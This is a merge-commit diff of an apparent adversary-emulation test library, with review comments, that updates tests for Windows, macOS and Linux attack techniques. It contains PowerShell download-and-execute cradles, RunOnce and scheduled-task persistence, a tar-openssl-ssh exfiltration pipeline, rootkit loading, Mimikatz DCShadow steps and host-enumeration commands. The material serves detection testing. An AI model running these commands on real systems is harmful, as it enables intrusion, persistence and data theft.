Merge branch 'master' into t1105-fix

Keith McCammon
2018-11-10 14:23:53 -07:00
committed by GitHub
36 changed files with 391 additions and 164 deletions
@@ -8,11 +8,11 @@ $temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
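Review bot: the comment `# Note that these are alias' for Invoke-WebRequest.` has a stray apostrophe ("aliases") and the next line should read "in your detection tools", not "in you detection tools"; since this hunk already touches the two download lines, fix the comments in the same change. It would also help to state in the comment that both fetches pull the same Discovery.bat (to `$temp\1.bat` and `$temp\2.bat`) and only 1.bat is executed, so the curl variant exercises the download side only.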
@@ -16,7 +16,7 @@ SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:http
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
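Review bot: the comment `:: Have PowerShell download the Discovery.bat, output to a local file (for review later)` does not describe the command under it: `IEX (New-Object Net.WebClient).DownloadString(...)` executes the downloaded script, and `> output.txt` captures the output of that execution, not the payload. If the intent is to keep a copy for review, drop `IEX` (or use `DownloadFile`); if the intent is to execute, reword the comment. Separately, the `:: Tactic: Credential Access` header that follows sits above `Create Account https://attack.mitre.org/wiki/Technique/T1136`, which ATT&CK files under Persistence.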
@@ -36,7 +36,7 @@ tasklist.exe | findstr defender
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
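Review bot: the raw GitHub URL for Discovery.bat is now repeated verbatim in all three hunks of this file, which is exactly why this commit has to touch three lines for one path move. Define it once near the top, e.g. `set DISCOVERY_URL=https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`, and reference `%DISCOVERY_URL%` in each `powershell.exe` line.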
@@ -22,7 +22,7 @@ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-t
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
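Review bot: the inline one-liner on the last line of this hunk is now out of sync with the file the updated comment points at: the new ARTifacts/Misc/Discovery.bat adds `sc query`, which the one-liner lacks, and the one-liner uses `"cmd.exe" /C whoami` where the file has a bare `whoami`. Either generate one from the other or document that they differ on purpose. Also fix `execute an discovery sequence` ("a discovery sequence") in the Step 2 comment, and the doubled backslash in the two `Winlogon\\Shell` queries, which looks like a typo carried over from the file.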
@@ -0,0 +1,44 @@
net user Administrator /domain
net Accounts
net localgroup administrators
net use
net share
net group "domain admins" /domain
net config workstation
net accounts
net accounts /domain
net view
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
wmic useraccount list
wmic useraccount get /ALL
wmic startup list brief
wmic share list
wmic service get name,displayname,pathname,startmode
wmic process list brief
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
arp -a
whoami
ipconfig /displaydns
route print
netsh advfirewall show allprofiles
systeminfo
qwinsta
quser
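Review bot: the comma-separated `wmic ... get` lines (`wmic service get name,displayname,pathname,startmode`, `wmic process get caption,executablepath,commandline`, `wmic qfe get description,installedOn /format:csv`) will not do what they do under cmd.exe when this file is fed through `IEX` in PowerShell, as the other hunks in this commit do: PowerShell parses an unquoted comma list as an array and hands each element to wmic as a separate argument. Quote the lists (`'name,displayname,pathname,startmode'`) or keep the file cmd-only and launch it with cmd.exe. Smaller points: `net Accounts` and `net accounts` both run (duplicate), and the two `Winlogon\\Shell` queries carry a doubled backslash.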
@@ -24,7 +24,7 @@ Requires Network: No</blockquote>
<br/>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
TODO
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
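Review bot: all three tests in this file now receive the identical sentence `An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration`, so the rendered descriptions no longer distinguish them; each description should at least name the tool the test exercises (Compress-Archive, rar, and the nix variant) and where the archive lands.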
@@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
<br/>
## Atomic Test #2 - Compress Data for Exfiltration With Rar
TODO
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
@@ -62,7 +62,7 @@ rar a -r #{output_file} #{input_file}
<br/>
## Atomic Test #3 - Data Compressed - nix
TODO
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Linux, macOS
@@ -20,9 +20,7 @@ Permissions Required: Administrator, SYSTEM, root</blockquote>
- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
- [Atomic Test #3 - LD_PRELOAD based Rootkit](#atomic-test-3---ld_preload-based-rootkit)
- [Atomic Test #4 - Windows Signed Driver Rootkit Test](#atomic-test-4---windows-signed-driver-rootkit-test)
- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)
<br/>
@@ -63,20 +61,7 @@ sudo modprobe #{rootkit_file}
<br/>
<br/>
## Atomic Test #3 - LD_PRELOAD based Rootkit
LD_PRELOAD based Rootkit
**Supported Platforms:** Linux
#### Run it with `sh`!
```
export LD_PRELOAD=$PWD/#{rootkit_file}
```
<br/>
<br/>
## Atomic Test #4 - Windows Signed Driver Rootkit Test
## Atomic Test #3 - Windows Signed Driver Rootkit Test
This test exploits a signed driver to execute code in Kernel.
SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
We leverage the work done here:
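Review bot: the LD_PRELOAD test is deleted here with no replacement and no rationale in the commit message. If the reason is that it referenced `#{rootkit_file}` without declaring it (the removed block has no Inputs table, unlike the `sudo modprobe #{rootkit_file}` test above it), say so in the commit or PR description, because the index files and test numbering change with it. Also, `execute code in Kernel` in the renumbered Test #3 reads better as `in the kernel`.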
@@ -24,7 +24,7 @@ Requires Network: No</blockquote>
<br/>
## Atomic Test #1 - Data Encrypted
TODO
Encrypt data for exiltration
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
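Review bot: the new description `Encrypt data for exiltration` misspells exfiltration; since this line replaces a TODO, fix it in the same change. The platform list `macOS, CentOS, Ubuntu, Linux` is also redundant, as CentOS and Ubuntu are Linux.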
@@ -23,11 +23,6 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | TODO | todo | TODO|
#### Run it with `sh`!
```
cd /tmp/
@@ -51,6 +51,13 @@ Local to Remote
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
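Review bot: `openssl des3 -salt -pass #{password}` is wrong as written: `-pass` takes a source specification such as `pass:#{password}` (or `env:`/`file:`), so with the new default `atomic` the command fails before anything is sent. Also, the `domain` input is typed `url` but holds a bare hostname (`target.example.com`), and `tar czpf - /Users/*` is a macOS path even though the test is listed for CentOS, Ubuntu and Linux; consider a `#{source_dir}` input with a platform-neutral default.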
@@ -79,7 +79,7 @@ RunOnce Key Persistence via PowerShell
#### Run it with `powershell`!
```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
```
<br/>
@@ -56,7 +56,7 @@ atomic_tests:
name: powershell
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: |
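Review bot: `set-itemproperty $RunOnceKey "NextRun" ...` followed immediately by `Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force` in the same command means the value never survives to the next logon, so the test exercises the registry write only, not RunOnce persistence. If write-then-clean-up is the intent, say so in the description; otherwise move the removal into a separate cleanup step. The generated .md copy in the hunk above carries the same pair of lines.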
@@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file
#### Run it with `powershell`!
```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
```
<br/>
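Review bot: the command is a quoted string followed by a redirect: `"IEX (New-Object Net.WebClient).DownloadString('...')" > c:\windows\pi.log` evaluates the string literal and writes its text into pi.log; nothing is downloaded and `IEX` never runs. If the goal stated above (`download discovery.bat and save to a local file`) is to stage the file, drop the outer quotes and the `IEX`, e.g. `(New-Object Net.WebClient).DownloadString('...') > c:\windows\pi.log`, or use `DownloadFile`. The YAML hunk below has the same line and is the one to fix first, since the .md is generated from it.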
@@ -13,4 +13,4 @@ atomic_tests:
executor:
name: powershell
command: |
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
@@ -0,0 +1,50 @@
# T1090 - Connection Proxy
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090)
<blockquote>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)
The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Platforms: Linux, macOS, Windows
Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture
Requires Network: Yes
Contributors: Walker Johnson</blockquote>
## Atomic Tests
- [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy)
<br/>
## Atomic Test #1 - Connection Proxy
Enable traffic redirection.
To undo changes made by this test:
unset http_proxy
unset https_proxy
Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
#### Run it with `sh`!
```
export #{proxy_scheme}_proxy=#{proxy_server}
```
<br/>
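Review bot: the description promises `Enable traffic redirection` and lists `unset http_proxy` / `unset https_proxy` as the undo, but `export #{proxy_scheme}_proxy=#{proxy_server}` under the `sh` executor only sets the variable in that child shell; nothing is redirected after the executor exits and there is nothing left to unset. Either state that the command must be sourced into a persistent shell, or write the setting to a profile file and make the undo remove it.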
@@ -0,0 +1,34 @@
---
attack_technique: T1090
display_name: Connection Proxy
atomic_tests:
- name: Connection Proxy
description: |
Enable traffic redirection.
To undo changes made by this test:
unset http_proxy
unset https_proxy
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- macos
- linux
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
type: url
default: 127.0.0.1:8080
proxy_scheme:
description: Protocol to proxy (http or https)
type: string
default: http
executor:
name: sh
command: |
export #{proxy_scheme}_proxy=#{proxy_server}
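Review bot: `proxy_server` is declared `type: url` with the description `Proxy server URL (host:port)`, but the default `127.0.0.1:8080` has no scheme; clients that read `http_proxy` generally expect `http://host:port`. Either change the type to `string` and keep the host:port wording, or give the default a scheme so the description, type and default agree.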
@@ -32,7 +32,7 @@ Stomps on the access timestamp of a file
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
```
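Review bot: the new default `/opt/filename` normally does not exist and /opt is root-owned, so a run with the default either fails on a missing file or, because `touch` creates missing files, silently creates one in /opt when run as root. A path the test creates first, or one under /tmp, would be a safer default; the same value is added in the two hunks below.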
@@ -50,7 +50,7 @@ Stomps on the modification timestamp of a file
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
```
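Review bot: the input description in this hunk still reads `Path of file that we are going to stomp on last access time`, although the test it belongs to (`Stomps on the modification timestamp of a file`) changes the modification time; this was copied from the first test and should say "modification time".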
@@ -71,7 +71,7 @@ Sudo or root privileges are required to change date. Use with caution.
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
```
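Review bot: same copy-paste here: the description `stomp on last access time` is attached to the test that, per its context line, changes the system date and needs sudo or root; adjust it so the rendered Inputs table matches what the test does.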
@@ -13,6 +13,7 @@ atomic_tests:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
default: /opt/filename
executor:
name: sh
command: |
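Review bot: the .md changes in this commit are generated from this YAML, so the `description:` text for the second and third tests (which still says `last access time` for the modification-time and system-date tests) should be corrected here alongside the new `default: /opt/filename`; otherwise the next regeneration reintroduces the mismatch.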
@@ -28,6 +29,7 @@ atomic_tests:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
default: /opt/filename
executor:
name: sh
command: |
@@ -47,6 +49,7 @@ atomic_tests:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
default: /opt/filename
executor:
name: sh
command: |
@@ -18,20 +18,20 @@ Requires Network: Yes</blockquote>
## Atomic Tests
- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)
- [Atomic Test #1 - rsync - scp - sftp remote file copy](#atomic-test-1---rsync---scp---sftp-remote-file-copy)
<br/>
## Atomic Test #1 - xxxx
xxxx
## Atomic Test #1 - rsync - scp - sftp remote file copy
Utilize rsync, scp and sftp to perform a remote file copy
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
```
### TODO: Not sure how to handle commands that need to be run on multiple systems
### FIX: Not sure how to handle commands that need to be run on multiple systems
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
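Review bot: renaming the in-script comment from `### TODO:` to `### FIX:` leaves the same open question inside the executed command block (`Not sure how to handle commands that need to be run on multiple systems`). Move it into the test description, and document the adversary-side SSH setup as a prerequisite rather than a comment, because the `bash` executor runs everything on a single host and a reader of the rendered test has no way to see which lines belong where.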
@@ -23,7 +23,7 @@ Permissions Required: User, Administrator</blockquote>
<br/>
## Atomic Test #1 - Plist Modification
TODO
Modify MacOS plist file in one of two directories
**Supported Platforms:** macOS
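Review bot: `Modify MacOS plist file in one of two directories` should name the two directories; a description that replaces a TODO needs to give the reader enough to reproduce the test.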
@@ -41,7 +41,7 @@ Permissions Required: User</blockquote>
- [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files)
- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories)
- [Atomic Test #7 - Create Visible Directories](#atomic-test-7---create-visible-directories)
- [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files)
@@ -67,7 +67,7 @@ echo "this file is hidden" > .hidden-directory/.hidden-file
<br/>
## Atomic Test #2 - Mac Hidden file
TODO
Hide a file on MacOS
**Supported Platforms:** macOS
@@ -99,11 +99,16 @@ mv #(unknown) .#{output_filename}
<br/>
## Atomic Test #4 - Hidden files
Requieres Apple Dev Tools
Requires Apple Dev Tools
**Supported Platforms:** macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
#### Run it with `sh`!
```
setfile -a V #(unknown)
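Review bot: this hunk adds a `filename` input (default `/tmp/evil`), but the command line still reads `setfile -a V #(unknown)` rather than `setfile -a V #{filename}`; unless that is a rendering artifact, the new input is never used and the test runs with no target.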
@@ -112,11 +117,16 @@ setfile -a V #(unknown)
<br/>
## Atomic Test #5 - Hide a Directory
xxx
Hide a directory on MacOS
**Supported Platforms:** macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
#### Run it with `sh`!
```
chflags hidden #(unknown)
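Review bot: same issue as the previous hunk: `chflags hidden #(unknown)` does not reference the newly added `#{filename}` input. In addition, the input is described as `path of file to hide` for a test titled `Hide a Directory`, and the default `/tmp/evil` is a file path; say "directory" and pick a default that the test can create.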
@@ -125,7 +135,7 @@ chflags hidden #(unknown)
<br/>
## Atomic Test #6 - Show all hidden files
xxx
Show all hidden files on MacOS
**Supported Platforms:** macOS
@@ -137,8 +147,8 @@ defaults write com.apple.finder AppleShowAllFiles YES
<br/>
<br/>
## Atomic Test #7 - Create visible Directories
xxx
## Atomic Test #7 - Create Visible Directories
Create visible directories on MacOS and Linux
**Supported Platforms:** macOS, Linux
@@ -154,7 +164,7 @@ ls visible-directory
<br/>
## Atomic Test #8 - Create hidden directories and files
xxx
Create hidden directories and files on Nix platforms
**Supported Platforms:** macOS, Linux
@@ -51,11 +51,15 @@ atomic_tests:
- name: Hidden files
description: |
Requieres Apple Dev Tools
Requires Apple Dev Tools
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: /tmp/evil
executor:
name: sh
command: |
@@ -67,7 +71,11 @@ atomic_tests:
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: /tmp/evil
executor:
name: sh
command: |
@@ -24,7 +24,7 @@ Permissions Required: Administrator</blockquote>
<br/>
## Atomic Test #1 - Launch Daemon
TODO
Utilize LaunchDaemon to launch `Hello World`
**Supported Platforms:** macOS
@@ -36,7 +36,7 @@ Contributors: Anastasios Pingios</blockquote>
<br/>
## Atomic Test #1 - Cron Job
TODO
Set a cron job
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
@@ -54,7 +54,7 @@ echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
<br/>
## Atomic Test #2 - Cron Job
TODO
Manually set a cron job
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
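Review bot: both tests in this file are still named `Cron Job` (`Atomic Test #1 - Cron Job`, `Atomic Test #2 - Cron Job`), so the TOC anchors and index entries collide; since the descriptions are being filled in here anyway, give each test a distinct name that states the method it uses (`Set a cron job` vs. `Manually set a cron job` is not enough to tell them apart).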
@@ -22,13 +22,13 @@ Permissions Required: Administrator, SYSTEM</blockquote>
- [Atomic Test #1 - IFEO Add Debugger](#atomic-test-1---ifeo-add-debugger)
- [Atomic Test #2 - IFEO GLobal Flags](#atomic-test-2---ifeo-global-flags)
- [Atomic Test #2 - IFEO Global Flags](#atomic-test-2---ifeo-global-flags)
<br/>
## Atomic Test #1 - IFEO Add Debugger
TODO
Leverage Global Flags Settings
**Supported Platforms:** Windows
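Review bot: Test #1 `IFEO Add Debugger` receives the description `Leverage Global Flags Settings`, which is the description of Test #2 `IFEO Global Flags` (visible in the next hunk); the Debugger test should describe adding a `Debugger` value under Image File Execution Options instead of duplicating the GlobalFlag wording.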
@@ -46,7 +46,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
<br/>
<br/>
## Atomic Test #2 - IFEO GLobal Flags
## Atomic Test #2 - IFEO Global Flags
Leverage Global Flags Settings
**Supported Platforms:** Windows
@@ -40,11 +40,6 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | TODO | todo | TODO|
#### Run it with these steps!
1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
@@ -45,7 +45,7 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
- Atomic Test #7: Create visible Directories [macos, linux]
- Atomic Test #7: Create Visible Directories [macos, linux]
- Atomic Test #8: Create hidden directories and files [macos, linux]
- Atomic Test #9: Create ADS command prompt [windows]
- Atomic Test #10: Create ADS PowerShell [windows]
@@ -55,7 +55,7 @@
- Atomic Test #1: Installing Hyper-V Feature [windows]
- [T1183 Image File Execution Options Injection](./T1183/T1183.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO GLobal Flags [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -191,7 +191,7 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
- Atomic Test #7: Create visible Directories [macos, linux]
- Atomic Test #7: Create Visible Directories [macos, linux]
- Atomic Test #8: Create hidden directories and files [macos, linux]
- Atomic Test #9: Create ADS command prompt [windows]
- Atomic Test #10: Create ADS PowerShell [windows]
@@ -200,7 +200,7 @@
- T1143 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1183 Image File Execution Options Injection](./T1183/T1183.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO GLobal Flags [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
@@ -253,8 +253,7 @@
- [T1014 Rootkit](./T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: LD_PRELOAD based Rootkit [linux]
- Atomic Test #4: Windows Signed Driver Rootkit Test [windows]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- [T1085 Rundll32](./T1085/T1085.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -304,7 +303,7 @@
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1183 Image File Execution Options Injection](./T1183/T1183.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO GLobal Flags [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- [T1160 Launch Daemon](./T1160/T1160.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1050 New Service](./T1050/T1050.md)
@@ -557,7 +556,7 @@
- [T1076 Remote Desktop Protocol](./T1076/T1076.md)
- Atomic Test #1: RDP [windows]
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx [linux, macos]
- Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
